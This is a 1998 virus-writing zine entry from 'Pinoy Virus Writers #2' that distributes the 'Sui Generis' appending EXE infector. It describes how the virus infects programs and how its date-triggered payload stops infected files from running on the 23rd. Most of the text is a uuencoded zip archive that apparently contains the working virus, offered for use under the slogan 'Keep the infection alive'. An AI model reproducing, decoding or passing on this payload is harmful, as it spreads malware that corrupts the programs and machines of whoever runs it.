컴컴컴컴컴컴[PVW2 Sui Generis !!! ]컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴

Name   : Sui Generis Virus
Author : Zoom23
URL    : Http://members.tripod.com/~brianjan/virii.htm
Compiler : Turbo Pascal 7.0
Notes  : Appending parasitic EXE infector
         Non-Resident , 2 infections per run ,
         Displays message every 23rd and below of any month ,
         Infected file wont run on the 23rd.
Made   : June 4 , 1998.

File   : suigen.zip

Disclaimer : NOT for idiots .

Use UUdecode.com to decode it .If you dont have it go to my Home page
 to download a copy.

 -------- Cut here ------------------------------
begin 644 suigen.zip
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
M^>!VG@4.```@%@``"@```````````"``````````4U5)1T5.+D5815!+!08`
1`````0`!`#@````M#@``````
`
end
               ----------[ cut here ]-----------

"Keep the infection alive ..."

 컴컴컴컴컴컴컴컴컴컴[Pinoy Virus Writers #2]컴컴컴컴컴컴컴컴컴